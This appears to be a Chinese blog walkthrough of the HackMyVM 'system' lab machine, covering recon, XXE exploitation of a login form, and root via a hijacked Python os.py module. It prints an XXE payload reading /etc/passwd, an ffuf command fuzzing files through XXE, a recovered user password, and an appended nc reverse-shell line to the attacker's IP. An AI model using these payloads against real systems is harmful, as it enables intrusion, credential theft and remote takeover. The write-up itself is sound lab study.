lvzhouhang

HackmyVM-system

  • ~5.57K 字
  1. 1. 信息搜集
  2. 2. 80端口
  3. 3. 提权

信息搜集

arp-scan -l

1
2
3
4
5
6
7
┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:72:be:a6       PCS Systemtechnik GmbH
192.168.31.141  08:00:27:27:28:54       PCS Systemtechnik GmbH

192.168.31.141就是靶机ip

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.141
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 03:39 EDT
Nmap scan report for 192.168.31.141
Host is up (0.0029s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:27:28:54 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

80端口

有一个登录的页面,通过查看请求头可以发现他是以xml的格式传输的

1
<?xml version="1.0" encoding="UTF-8"?><details><email>123@123.com</email><password>123</password></details>

试一试xxe注入

1
2
3
<!DOCTYPE test [ 
<!ENTITY test1 SYSTEM "file:///etc/passwd"> 
]><details><email>$test1;</email><password>123</password></details>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<p align='center'> <font color=white size='5pt'> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
david:x:1000:1000::/home/david:/bin/bash
 is already registered! </font> </p>

读取david用户的私钥尝试登录,但是会登录失败,通过fuzz可以知道/home/david还有一个.viminfo

1
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u http://192.168.31.141/magic.php  -d '<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/david/FUZZ"> ]> <details><email>&xxe;</email><password>das</password></details>' --fw 11
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
 # This viminfo file was generated by Vim 8.2.
# You may edit it if you're careful!

# Viminfo version
|1,4

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:wq!
|2,0,1648909714,,"wq!"

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Debug Line History (newest to oldest):

# Registers:

# Password file Created:
'0  1  3  /usr/local/etc/mypass.txt
|4,48,1,3,1648909714,"/usr/local/etc/mypass.txt"

# History of marks within files (newest to oldest):

> /usr/local/etc/mypass.txt
	*	1648909713	0
	"	1	3
	^	1	4
	.	1	3
	+	1	3

然后读取/usr/local/etc/mypass.txt文件

david的密码为h4ck3rd4v!d

提权

上传一个pspy64查看,发现每隔一段时间会运行一次suid.py文件

1
2025/04/18 04:01:01 CMD: UID=0     PID=670    | /bin/sh -c /usr/bin/python3.9 /opt/suid.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#suid.py
from os import system
from pathlib import Path

# Reading only first line
try:
    with open('/home/david/cmd.txt', 'r') as f:
        read_only_first_line = f.readline()
    # Write a new file
    with open('/tmp/suid.txt', 'w') as f:
        f.write(f"{read_only_first_line}")
    check = Path('/tmp/suid.txt')
    if check:
        print("File exists")
        try:
            os.system("chmod u+s /bin/bash")
        except NameError:
            print("Done")
    else:
        print("File not exists")
except FileNotFoundError:
    print("File not exists")

这个脚本永远不会执行chmod,查看是否可以劫持

1
2
3
4
python3 -c 'import sys; print(sys.path)'
['', '/usr/lib/python39.zip', '/usr/lib/python3.9', '/usr/lib/python3.9/lib-dynload', '/usr/local/lib/python3.9/dist-packages', '/usr/lib/python3/dist-packages']
david@system:/usr/lib/python3.9$ find ./ -writable 2>/dev/null
./os.py

向os.py尾部添加

1
2
3
4
5
import subprocess
def shell():
    import subprocess
    subprocess.call("nc" + "192.168.31.129 9999 -e /bin/bash", shell=True)
shell()

然后监听一个端口静静等shell弹回来

1
2
id
uid=0(root) gid=0(root) groups=0(root)
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!